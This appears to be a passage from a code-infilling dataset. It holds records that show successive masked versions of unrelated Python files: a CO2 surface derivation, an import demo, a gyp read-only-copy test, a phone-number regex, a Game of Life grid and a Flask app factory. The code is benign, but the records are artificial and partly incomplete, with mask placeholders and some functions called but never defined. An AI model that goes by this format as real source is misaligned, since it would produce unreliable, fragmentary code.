"step-5": "\"\"\"Derivation of variable ``co2s``.\"\"\"\nimport dask.array as da\nimport iris\nimport numpy as np\nimport stratify\n\nfrom ._baseclass import DerivedVariableBase\n\n\ndef _get_first_unmasked_data(array, axis):\n \"\"\"Get first unmasked value of an array along an axis.\"\"\"\n mask = da.ma.getmaskarray(array)\n numerical_mask = da.where(mask, -1.0, 1.0)\n indices_first_positive = da.argmax(numerical_mask, axis=axis)\n indices = da.meshgrid(\n *[da.arange(array.shape[i]) for i in range(array.ndim) if i != axis],\n indexing='ij')\n indices.insert(axis, indices_first_positive)\n first_unmasked_data = np.array(array)[tuple(indices)]\n return first_unmasked_data\n\n\nclass DerivedVariable(DerivedVariableBase):\n \"\"\"Derivation of variable ``co2s``.\n\n Use linear interpolation/extrapolation and surface air pressure to\n calculate CO2 mole fraction at surface.\n\n Note\n ----\n In some cases, ``co2`` data is masked. In these cases, the masked values\n correspond to values where the pressure level is higher than the surface\n air pressure (e.g. the 1000 hPa level for grid cells with high elevation).\n To obtain an unmasked ``co2s`` field, it is necessary to fill these masked\n values accordingly, i.e. with the lowest unmasked value for each grid cell.\n\n \"\"\"\n\n @staticmethod\n def required(project):\n \"\"\"Declare the variables needed for derivation.\"\"\"\n required = [{'short_name': 'co2'}, {'short_name': 'ps'}]\n return required\n\n @staticmethod\n def calculate(cubes):\n \"\"\"Compute mole fraction of CO2 at surface.\"\"\"\n co2_cube = cubes.extract_cube(\n iris.Constraint(name='mole_fraction_of_carbon_dioxide_in_air'))\n ps_cube = cubes.extract_cube(\n iris.Constraint(name='surface_air_pressure'))\n\n # Fill masked data if necessary (interpolation fails with masked data)\n (z_axis,) = co2_cube.coord_dims(co2_cube.coord(axis='Z',\n dim_coords=True))\n mask = da.ma.getmaskarray(co2_cube.core_data())\n if mask.any():\n first_unmasked_data = _get_first_unmasked_data(\n co2_cube.core_data(), axis=z_axis)\n dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]\n first_unmasked_data = iris.util.broadcast_to_shape(\n first_unmasked_data, co2_cube.shape, dim_map)\n co2_cube.data = da.where(mask, first_unmasked_data,\n co2_cube.core_data())\n\n # Interpolation (not supported for dask arrays)\n air_pressure_coord = co2_cube.coord('air_pressure')\n original_levels = iris.util.broadcast_to_shape(\n air_pressure_coord.points, co2_cube.shape,\n co2_cube.coord_dims(air_pressure_coord))\n target_levels = np.expand_dims(ps_cube.data, axis=z_axis)\n co2s_data = stratify.interpolate(\n target_levels,\n original_levels,\n co2_cube.data,\n axis=z_axis,\n interpolation='linear',\n extrapolation='linear',\n )\n co2s_data = np.squeeze(co2s_data, axis=z_axis)\n\n # Construct co2s cube\n indices = [slice(None)] * co2_cube.ndim\n indices[z_axis] = 0\n co2s_cube = co2_cube[tuple(indices)]\n co2s_cube.data = co2s_data\n if co2s_cube.coords('air_pressure'):\n co2s_cube.remove_coord('air_pressure')\n ps_coord = iris.coords.AuxCoord(ps_cube.data,\n var_name='plev',\n standard_name='air_pressure',\n long_name='pressure',\n units=ps_cube.units)\n co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))\n co2s_cube.convert_units('1e-6')\n return co2s_cube\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# PROBLEM: Code organized in package and want to import a submodule from one o the other pkg
# submodules without hardcoding the package name into the import statement
# SOLUTION: Use pkg-relative import
# Absolete path
from mypackage.A import grok
print(dir(grok))
grok.testA()
|
normal
|
{
"blob_id": "ad9facb9c8e552845df9171549f886f3e9cba193",
"index": 7544,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(dir(grok))\ngrok.testA()\n",
"step-3": "from mypackage.A import grok\nprint(dir(grok))\ngrok.testA()\n",
"step-4": "# PROBLEM: Code organized in package and want to import a submodule from one o the other pkg\n# submodules without hardcoding the package name into the import statement\n# SOLUTION: Use pkg-relative import\n\n# Absolete path\nfrom mypackage.A import grok\n\nprint(dir(grok))\ngrok.testA()",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['ninja'])
os.makedirs('subdir')
read_only_files = ['read-only-file', 'subdir/A', 'subdir/B', 'subdir/C']
for f in read_only_files:
test.write(f, 'source_contents')
test.chmod(f, stat.S_IREAD)
if os.access(f, os.W_OK):
test.fail_test()
os.makedirs(test.built_file_path('dest/subdir'))
for f in read_only_files:
f = os.path.join('dest', f)
test.write(test.built_file_path(f), 'SHOULD BE OVERWRITTEN')
test.chmod(test.built_file_path(f), stat.S_IREAD)
if os.access(test.built_file_path(f), os.W_OK):
test.fail_test()
test.run_gyp('copies_readonly_files.gyp')
test.build('copies_readonly_files.gyp')
for f in read_only_files:
f = os.path.join('dest', f)
test.must_contain(test.built_file_path(f), 'source_contents')
for f in read_only_files:
if not filecmp.cmp(f, test.built_file_path(os.path.join('dest', f))):
test.fail_test()
test.pass_test()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import TestGyp
import filecmp
import os
import stat
import sys
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['ninja'])
os.makedirs('subdir')
read_only_files = ['read-only-file', 'subdir/A', 'subdir/B', 'subdir/C']
for f in read_only_files:
test.write(f, 'source_contents')
test.chmod(f, stat.S_IREAD)
if os.access(f, os.W_OK):
test.fail_test()
os.makedirs(test.built_file_path('dest/subdir'))
for f in read_only_files:
f = os.path.join('dest', f)
test.write(test.built_file_path(f), 'SHOULD BE OVERWRITTEN')
test.chmod(test.built_file_path(f), stat.S_IREAD)
if os.access(test.built_file_path(f), os.W_OK):
test.fail_test()
test.run_gyp('copies_readonly_files.gyp')
test.build('copies_readonly_files.gyp')
for f in read_only_files:
f = os.path.join('dest', f)
test.must_contain(test.built_file_path(f), 'source_contents')
for f in read_only_files:
if not filecmp.cmp(f, test.built_file_path(os.path.join('dest', f))):
test.fail_test()
test.pass_test()
<|reserved_special_token_1|>
"""
Make sure overwriting read-only files works as expected (via win-tool).
"""
import TestGyp
import filecmp
import os
import stat
import sys
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['ninja'])
os.makedirs('subdir')
read_only_files = ['read-only-file', 'subdir/A', 'subdir/B', 'subdir/C']
for f in read_only_files:
test.write(f, 'source_contents')
test.chmod(f, stat.S_IREAD)
if os.access(f, os.W_OK):
test.fail_test()
os.makedirs(test.built_file_path('dest/subdir'))
for f in read_only_files:
f = os.path.join('dest', f)
test.write(test.built_file_path(f), 'SHOULD BE OVERWRITTEN')
test.chmod(test.built_file_path(f), stat.S_IREAD)
if os.access(test.built_file_path(f), os.W_OK):
test.fail_test()
test.run_gyp('copies_readonly_files.gyp')
test.build('copies_readonly_files.gyp')
for f in read_only_files:
f = os.path.join('dest', f)
test.must_contain(test.built_file_path(f), 'source_contents')
for f in read_only_files:
if not filecmp.cmp(f, test.built_file_path(os.path.join('dest', f))):
test.fail_test()
test.pass_test()
|
flexible
|
{
"blob_id": "efe5921afb160b7b5a953cdd0c2f90f64b5f34c9",
"index": 5975,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif sys.platform == 'win32':\n test = TestGyp.TestGyp(formats=['ninja'])\n os.makedirs('subdir')\n read_only_files = ['read-only-file', 'subdir/A', 'subdir/B', 'subdir/C']\n for f in read_only_files:\n test.write(f, 'source_contents')\n test.chmod(f, stat.S_IREAD)\n if os.access(f, os.W_OK):\n test.fail_test()\n os.makedirs(test.built_file_path('dest/subdir'))\n for f in read_only_files:\n f = os.path.join('dest', f)\n test.write(test.built_file_path(f), 'SHOULD BE OVERWRITTEN')\n test.chmod(test.built_file_path(f), stat.S_IREAD)\n if os.access(test.built_file_path(f), os.W_OK):\n test.fail_test()\n test.run_gyp('copies_readonly_files.gyp')\n test.build('copies_readonly_files.gyp')\n for f in read_only_files:\n f = os.path.join('dest', f)\n test.must_contain(test.built_file_path(f), 'source_contents')\n for f in read_only_files:\n if not filecmp.cmp(f, test.built_file_path(os.path.join('dest', f))):\n test.fail_test()\n test.pass_test()\n",
"step-3": "<mask token>\nimport TestGyp\nimport filecmp\nimport os\nimport stat\nimport sys\nif sys.platform == 'win32':\n test = TestGyp.TestGyp(formats=['ninja'])\n os.makedirs('subdir')\n read_only_files = ['read-only-file', 'subdir/A', 'subdir/B', 'subdir/C']\n for f in read_only_files:\n test.write(f, 'source_contents')\n test.chmod(f, stat.S_IREAD)\n if os.access(f, os.W_OK):\n test.fail_test()\n os.makedirs(test.built_file_path('dest/subdir'))\n for f in read_only_files:\n f = os.path.join('dest', f)\n test.write(test.built_file_path(f), 'SHOULD BE OVERWRITTEN')\n test.chmod(test.built_file_path(f), stat.S_IREAD)\n if os.access(test.built_file_path(f), os.W_OK):\n test.fail_test()\n test.run_gyp('copies_readonly_files.gyp')\n test.build('copies_readonly_files.gyp')\n for f in read_only_files:\n f = os.path.join('dest', f)\n test.must_contain(test.built_file_path(f), 'source_contents')\n for f in read_only_files:\n if not filecmp.cmp(f, test.built_file_path(os.path.join('dest', f))):\n test.fail_test()\n test.pass_test()\n",
"step-4": "\n\n\n\n\n\n\"\"\"\nMake sure overwriting read-only files works as expected (via win-tool).\n\"\"\"\n\nimport TestGyp\n\nimport filecmp\nimport os\nimport stat\nimport sys\n\nif sys.platform == 'win32':\n test = TestGyp.TestGyp(formats=['ninja'])\n\n \n os.makedirs('subdir')\n read_only_files = ['read-only-file', 'subdir/A', 'subdir/B', 'subdir/C']\n for f in read_only_files:\n test.write(f, 'source_contents')\n test.chmod(f, stat.S_IREAD)\n if os.access(f, os.W_OK):\n test.fail_test()\n\n \n \n \n os.makedirs(test.built_file_path('dest/subdir'))\n for f in read_only_files:\n f = os.path.join('dest', f)\n test.write(test.built_file_path(f), 'SHOULD BE OVERWRITTEN')\n test.chmod(test.built_file_path(f), stat.S_IREAD)\n \n if os.access(test.built_file_path(f), os.W_OK):\n test.fail_test()\n\n test.run_gyp('copies_readonly_files.gyp')\n test.build('copies_readonly_files.gyp')\n\n \n for f in read_only_files:\n f = os.path.join('dest', f)\n test.must_contain(test.built_file_path(f), 'source_contents')\n\n \n for f in read_only_files:\n if not filecmp.cmp(f, test.built_file_path(os.path.join('dest', f))):\n test.fail_test()\n\n test.pass_test()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import re
n = input("電話番号を入力してください>>")
pattern = r'[\(]{0,1}[0-9]{2,4}[\)\-\(]{0,1}[0-9]{2,4}[\)\-]{0,1}[0-9]{3,4}'
if re.findall(pattern, n):
print(n, "は電話番号の形式です")
else:
print(n, "は電話番号の形式ではありません")
|
normal
|
{
"blob_id": "7ea81f83f556fcc55c9c9d44bcd63c583829fc08",
"index": 8977,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif re.findall(pattern, n):\n print(n, 'は電話番号の形式です')\nelse:\n print(n, 'は電話番号の形式ではありません')\n",
"step-3": "<mask token>\nn = input('電話番号を入力してください>>')\npattern = (\n '[\\\\(]{0,1}[0-9]{2,4}[\\\\)\\\\-\\\\(]{0,1}[0-9]{2,4}[\\\\)\\\\-]{0,1}[0-9]{3,4}')\nif re.findall(pattern, n):\n print(n, 'は電話番号の形式です')\nelse:\n print(n, 'は電話番号の形式ではありません')\n",
"step-4": "import re\nn = input('電話番号を入力してください>>')\npattern = (\n '[\\\\(]{0,1}[0-9]{2,4}[\\\\)\\\\-\\\\(]{0,1}[0-9]{2,4}[\\\\)\\\\-]{0,1}[0-9]{3,4}')\nif re.findall(pattern, n):\n print(n, 'は電話番号の形式です')\nelse:\n print(n, 'は電話番号の形式ではありません')\n",
"step-5": "import re\n\nn = input(\"電話番号を入力してください>>\")\npattern = r'[\\(]{0,1}[0-9]{2,4}[\\)\\-\\(]{0,1}[0-9]{2,4}[\\)\\-]{0,1}[0-9]{3,4}'\nif re.findall(pattern, n):\n print(n, \"は電話番号の形式です\")\nelse:\n print(n, \"は電話番号の形式ではありません\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Cells:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, nx, ny, density=5):
self.nx = nx
self.ny = ny
self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]
self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in
range(nx)]
self._gen = [[(0) for y in range(ny)] for x in range(nx)]
for x in range(nx):
for y in range(ny):
status = Cells.ALIVE if random.randint(0, 100
) < density else Cells.DEAD
self._cells[x][y] = status
self._gen[x][y] = status - 1
def cell(self, x, y):
if x < 0 or x >= self.nx or y < 0 or y >= self.ny:
return Cells.DEAD
return self._cells[x][y]
<|reserved_special_token_0|>
def _countAliveNeighbours(self, x, y):
aliveNeighbours = 0
neighbours = (-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (
0, 1), (1, 1)
for ix, iy in neighbours:
neighbour = self.cell(x + ix, y + iy)
if neighbour == Cells.ALIVE:
aliveNeighbours += 1
return aliveNeighbours
def survive(self):
for x in range(self.nx):
for y in range(self.ny):
aliveNeighbours = self._countAliveNeighbours(x, y)
if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <=
1 or aliveNeighbours >= 4):
self._nextCells[x][y] = Cells.DEAD
self._gen[x][y] = 0
elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:
self._nextCells[x][y] = Cells.ALIVE
self._gen[x][y] = 1
else:
self._nextCells[x][y] = self._cells[x][y]
self._gen[x][y] += 1
self._cells = self._nextCells[:]
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Cells:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, nx, ny, density=5):
self.nx = nx
self.ny = ny
self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]
self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in
range(nx)]
self._gen = [[(0) for y in range(ny)] for x in range(nx)]
for x in range(nx):
for y in range(ny):
status = Cells.ALIVE if random.randint(0, 100
) < density else Cells.DEAD
self._cells[x][y] = status
self._gen[x][y] = status - 1
def cell(self, x, y):
if x < 0 or x >= self.nx or y < 0 or y >= self.ny:
return Cells.DEAD
return self._cells[x][y]
def gen(self, x, y):
if x < 0 or x >= self.nx or y < 0 or y >= self.ny:
return 0
return self._gen[x][y]
def _countAliveNeighbours(self, x, y):
aliveNeighbours = 0
neighbours = (-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (
0, 1), (1, 1)
for ix, iy in neighbours:
neighbour = self.cell(x + ix, y + iy)
if neighbour == Cells.ALIVE:
aliveNeighbours += 1
return aliveNeighbours
def survive(self):
for x in range(self.nx):
for y in range(self.ny):
aliveNeighbours = self._countAliveNeighbours(x, y)
if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <=
1 or aliveNeighbours >= 4):
self._nextCells[x][y] = Cells.DEAD
self._gen[x][y] = 0
elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:
self._nextCells[x][y] = Cells.ALIVE
self._gen[x][y] = 1
else:
self._nextCells[x][y] = self._cells[x][y]
self._gen[x][y] += 1
self._cells = self._nextCells[:]
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Cells:
UNDEFINED = 0
DEAD = 1
ALIVE = 2
def __init__(self, nx, ny, density=5):
self.nx = nx
self.ny = ny
self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]
self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in
range(nx)]
self._gen = [[(0) for y in range(ny)] for x in range(nx)]
for x in range(nx):
for y in range(ny):
status = Cells.ALIVE if random.randint(0, 100
) < density else Cells.DEAD
self._cells[x][y] = status
self._gen[x][y] = status - 1
def cell(self, x, y):
if x < 0 or x >= self.nx or y < 0 or y >= self.ny:
return Cells.DEAD
return self._cells[x][y]
def gen(self, x, y):
if x < 0 or x >= self.nx or y < 0 or y >= self.ny:
return 0
return self._gen[x][y]
def _countAliveNeighbours(self, x, y):
aliveNeighbours = 0
neighbours = (-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (
0, 1), (1, 1)
for ix, iy in neighbours:
neighbour = self.cell(x + ix, y + iy)
if neighbour == Cells.ALIVE:
aliveNeighbours += 1
return aliveNeighbours
def survive(self):
for x in range(self.nx):
for y in range(self.ny):
aliveNeighbours = self._countAliveNeighbours(x, y)
if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <=
1 or aliveNeighbours >= 4):
self._nextCells[x][y] = Cells.DEAD
self._gen[x][y] = 0
elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:
self._nextCells[x][y] = Cells.ALIVE
self._gen[x][y] = 1
else:
self._nextCells[x][y] = self._cells[x][y]
self._gen[x][y] += 1
self._cells = self._nextCells[:]
<|reserved_special_token_1|>
import random
import time
class Cells:
UNDEFINED = 0
DEAD = 1
ALIVE = 2
def __init__(self, nx, ny, density=5):
self.nx = nx
self.ny = ny
self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]
self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in
range(nx)]
self._gen = [[(0) for y in range(ny)] for x in range(nx)]
for x in range(nx):
for y in range(ny):
status = Cells.ALIVE if random.randint(0, 100
) < density else Cells.DEAD
self._cells[x][y] = status
self._gen[x][y] = status - 1
def cell(self, x, y):
if x < 0 or x >= self.nx or y < 0 or y >= self.ny:
return Cells.DEAD
return self._cells[x][y]
def gen(self, x, y):
if x < 0 or x >= self.nx or y < 0 or y >= self.ny:
return 0
return self._gen[x][y]
def _countAliveNeighbours(self, x, y):
aliveNeighbours = 0
neighbours = (-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (
0, 1), (1, 1)
for ix, iy in neighbours:
neighbour = self.cell(x + ix, y + iy)
if neighbour == Cells.ALIVE:
aliveNeighbours += 1
return aliveNeighbours
def survive(self):
for x in range(self.nx):
for y in range(self.ny):
aliveNeighbours = self._countAliveNeighbours(x, y)
if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <=
1 or aliveNeighbours >= 4):
self._nextCells[x][y] = Cells.DEAD
self._gen[x][y] = 0
elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:
self._nextCells[x][y] = Cells.ALIVE
self._gen[x][y] = 1
else:
self._nextCells[x][y] = self._cells[x][y]
self._gen[x][y] += 1
self._cells = self._nextCells[:]
<|reserved_special_token_1|>
import random
import time
class Cells:
UNDEFINED = 0
DEAD = 1
ALIVE = 2
def __init__(self, nx, ny, density = 5):
self.nx = nx
self.ny = ny
self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]
self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]
self._gen = [[0 for y in range(ny)] for x in range(nx)]
for x in range(nx):
for y in range(ny):
# status = random.choice((Cells.DEAD, Cells.ALIVE))
status = Cells.ALIVE if random.randint(0, 100) < density else Cells.DEAD
self._cells[x][y] = status
self._gen[x][y] = status - 1
def cell(self, x, y):
if x < 0 or x >= self.nx or y < 0 or y >= self.ny:
return Cells.DEAD
return self._cells[x][y]
# return self._cells[x % self.nx][y % self.ny]
def gen(self, x, y):
if x < 0 or x >= self.nx or y < 0 or y >= self.ny:
return 0
return self._gen[x][y]
def _countAliveNeighbours(self, x, y):
aliveNeighbours = 0
neighbours = ((-1, -1), (0, -1), ( 1, -1),
(-1, 0), ( 1, 0),
(-1, 1), (0, 1), ( 1, 1))
for (ix, iy) in neighbours:
neighbour = self.cell(x + ix, y + iy)
if neighbour == Cells.ALIVE:
aliveNeighbours += 1
return aliveNeighbours
def survive(self):
for x in range(self.nx):
for y in range(self.ny):
aliveNeighbours = self._countAliveNeighbours(x, y)
if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <= 1 or aliveNeighbours >= 4):
self._nextCells[x][y] = Cells.DEAD
self._gen[x][y] = 0
elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:
self._nextCells[x][y] = Cells.ALIVE
self._gen[x][y] = 1
else:
self._nextCells[x][y] = self._cells[x][y]
self._gen[x][y] += 1
self._cells = self._nextCells[:]
|
flexible
|
{
"blob_id": "563e534e4794aa872dcdc5319b9a1943d19f940f",
"index": 1289,
"step-1": "<mask token>\n\n\nclass Cells:\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, nx, ny, density=5):\n self.nx = nx\n self.ny = ny\n self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]\n self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in\n range(nx)]\n self._gen = [[(0) for y in range(ny)] for x in range(nx)]\n for x in range(nx):\n for y in range(ny):\n status = Cells.ALIVE if random.randint(0, 100\n ) < density else Cells.DEAD\n self._cells[x][y] = status\n self._gen[x][y] = status - 1\n\n def cell(self, x, y):\n if x < 0 or x >= self.nx or y < 0 or y >= self.ny:\n return Cells.DEAD\n return self._cells[x][y]\n <mask token>\n\n def _countAliveNeighbours(self, x, y):\n aliveNeighbours = 0\n neighbours = (-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (\n 0, 1), (1, 1)\n for ix, iy in neighbours:\n neighbour = self.cell(x + ix, y + iy)\n if neighbour == Cells.ALIVE:\n aliveNeighbours += 1\n return aliveNeighbours\n\n def survive(self):\n for x in range(self.nx):\n for y in range(self.ny):\n aliveNeighbours = self._countAliveNeighbours(x, y)\n if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <=\n 1 or aliveNeighbours >= 4):\n self._nextCells[x][y] = Cells.DEAD\n self._gen[x][y] = 0\n elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:\n self._nextCells[x][y] = Cells.ALIVE\n self._gen[x][y] = 1\n else:\n self._nextCells[x][y] = self._cells[x][y]\n self._gen[x][y] += 1\n self._cells = self._nextCells[:]\n",
"step-2": "<mask token>\n\n\nclass Cells:\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, nx, ny, density=5):\n self.nx = nx\n self.ny = ny\n self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]\n self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in\n range(nx)]\n self._gen = [[(0) for y in range(ny)] for x in range(nx)]\n for x in range(nx):\n for y in range(ny):\n status = Cells.ALIVE if random.randint(0, 100\n ) < density else Cells.DEAD\n self._cells[x][y] = status\n self._gen[x][y] = status - 1\n\n def cell(self, x, y):\n if x < 0 or x >= self.nx or y < 0 or y >= self.ny:\n return Cells.DEAD\n return self._cells[x][y]\n\n def gen(self, x, y):\n if x < 0 or x >= self.nx or y < 0 or y >= self.ny:\n return 0\n return self._gen[x][y]\n\n def _countAliveNeighbours(self, x, y):\n aliveNeighbours = 0\n neighbours = (-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (\n 0, 1), (1, 1)\n for ix, iy in neighbours:\n neighbour = self.cell(x + ix, y + iy)\n if neighbour == Cells.ALIVE:\n aliveNeighbours += 1\n return aliveNeighbours\n\n def survive(self):\n for x in range(self.nx):\n for y in range(self.ny):\n aliveNeighbours = self._countAliveNeighbours(x, y)\n if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <=\n 1 or aliveNeighbours >= 4):\n self._nextCells[x][y] = Cells.DEAD\n self._gen[x][y] = 0\n elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:\n self._nextCells[x][y] = Cells.ALIVE\n self._gen[x][y] = 1\n else:\n self._nextCells[x][y] = self._cells[x][y]\n self._gen[x][y] += 1\n self._cells = self._nextCells[:]\n",
"step-3": "<mask token>\n\n\nclass Cells:\n UNDEFINED = 0\n DEAD = 1\n ALIVE = 2\n\n def __init__(self, nx, ny, density=5):\n self.nx = nx\n self.ny = ny\n self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]\n self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in\n range(nx)]\n self._gen = [[(0) for y in range(ny)] for x in range(nx)]\n for x in range(nx):\n for y in range(ny):\n status = Cells.ALIVE if random.randint(0, 100\n ) < density else Cells.DEAD\n self._cells[x][y] = status\n self._gen[x][y] = status - 1\n\n def cell(self, x, y):\n if x < 0 or x >= self.nx or y < 0 or y >= self.ny:\n return Cells.DEAD\n return self._cells[x][y]\n\n def gen(self, x, y):\n if x < 0 or x >= self.nx or y < 0 or y >= self.ny:\n return 0\n return self._gen[x][y]\n\n def _countAliveNeighbours(self, x, y):\n aliveNeighbours = 0\n neighbours = (-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (\n 0, 1), (1, 1)\n for ix, iy in neighbours:\n neighbour = self.cell(x + ix, y + iy)\n if neighbour == Cells.ALIVE:\n aliveNeighbours += 1\n return aliveNeighbours\n\n def survive(self):\n for x in range(self.nx):\n for y in range(self.ny):\n aliveNeighbours = self._countAliveNeighbours(x, y)\n if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <=\n 1 or aliveNeighbours >= 4):\n self._nextCells[x][y] = Cells.DEAD\n self._gen[x][y] = 0\n elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:\n self._nextCells[x][y] = Cells.ALIVE\n self._gen[x][y] = 1\n else:\n self._nextCells[x][y] = self._cells[x][y]\n self._gen[x][y] += 1\n self._cells = self._nextCells[:]\n",
"step-4": "import random\nimport time\n\n\nclass Cells:\n UNDEFINED = 0\n DEAD = 1\n ALIVE = 2\n\n def __init__(self, nx, ny, density=5):\n self.nx = nx\n self.ny = ny\n self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]\n self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in\n range(nx)]\n self._gen = [[(0) for y in range(ny)] for x in range(nx)]\n for x in range(nx):\n for y in range(ny):\n status = Cells.ALIVE if random.randint(0, 100\n ) < density else Cells.DEAD\n self._cells[x][y] = status\n self._gen[x][y] = status - 1\n\n def cell(self, x, y):\n if x < 0 or x >= self.nx or y < 0 or y >= self.ny:\n return Cells.DEAD\n return self._cells[x][y]\n\n def gen(self, x, y):\n if x < 0 or x >= self.nx or y < 0 or y >= self.ny:\n return 0\n return self._gen[x][y]\n\n def _countAliveNeighbours(self, x, y):\n aliveNeighbours = 0\n neighbours = (-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (\n 0, 1), (1, 1)\n for ix, iy in neighbours:\n neighbour = self.cell(x + ix, y + iy)\n if neighbour == Cells.ALIVE:\n aliveNeighbours += 1\n return aliveNeighbours\n\n def survive(self):\n for x in range(self.nx):\n for y in range(self.ny):\n aliveNeighbours = self._countAliveNeighbours(x, y)\n if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <=\n 1 or aliveNeighbours >= 4):\n self._nextCells[x][y] = Cells.DEAD\n self._gen[x][y] = 0\n elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:\n self._nextCells[x][y] = Cells.ALIVE\n self._gen[x][y] = 1\n else:\n self._nextCells[x][y] = self._cells[x][y]\n self._gen[x][y] += 1\n self._cells = self._nextCells[:]\n",
"step-5": "import random\nimport time\n\nclass Cells:\n UNDEFINED = 0\n DEAD = 1\n ALIVE = 2\n\n def __init__(self, nx, ny, density = 5):\n self.nx = nx\n self.ny = ny\n self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]\n self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]\n self._gen = [[0 for y in range(ny)] for x in range(nx)]\n for x in range(nx):\n for y in range(ny):\n# status = random.choice((Cells.DEAD, Cells.ALIVE))\n status = Cells.ALIVE if random.randint(0, 100) < density else Cells.DEAD\n self._cells[x][y] = status\n self._gen[x][y] = status - 1\n\n def cell(self, x, y):\n if x < 0 or x >= self.nx or y < 0 or y >= self.ny:\n return Cells.DEAD\n return self._cells[x][y]\n# return self._cells[x % self.nx][y % self.ny]\n\n def gen(self, x, y):\n if x < 0 or x >= self.nx or y < 0 or y >= self.ny:\n return 0\n return self._gen[x][y]\n\n def _countAliveNeighbours(self, x, y):\n aliveNeighbours = 0\n neighbours = ((-1, -1), (0, -1), ( 1, -1),\n (-1, 0), ( 1, 0),\n (-1, 1), (0, 1), ( 1, 1))\n for (ix, iy) in neighbours:\n neighbour = self.cell(x + ix, y + iy)\n if neighbour == Cells.ALIVE:\n aliveNeighbours += 1\n return aliveNeighbours\n\n def survive(self):\n for x in range(self.nx):\n for y in range(self.ny):\n aliveNeighbours = self._countAliveNeighbours(x, y)\n if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <= 1 or aliveNeighbours >= 4):\n self._nextCells[x][y] = Cells.DEAD\n self._gen[x][y] = 0\n elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:\n self._nextCells[x][y] = Cells.ALIVE\n self._gen[x][y] = 1\n else:\n self._nextCells[x][y] = self._cells[x][y]\n self._gen[x][y] += 1\n self._cells = self._nextCells[:]\n\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
# -*- coding: utf-8 -*-
"""The main application module for duffy."""
from flask import Flask
from duffy import api_v1
from duffy.types import seamicro
from duffy.extensions import db, migrate, marshmallow
from duffy.config import ProdConfig,DevConfig
def create_app(config_object=DevConfig):
app = Flask(__name__.split('.')[0])
app.config.from_object(config_object)
app.config.from_envvar('DUFFY_SETTINGS',silent=True)
register_extensions(app)
register_blueprints(app)
register_errorhandlers(app)
return app
def register_extensions(app):
db.init_app(app)
migrate.init_app(app, db, render_as_batch=True)
marshmallow.init_app(app)
return None
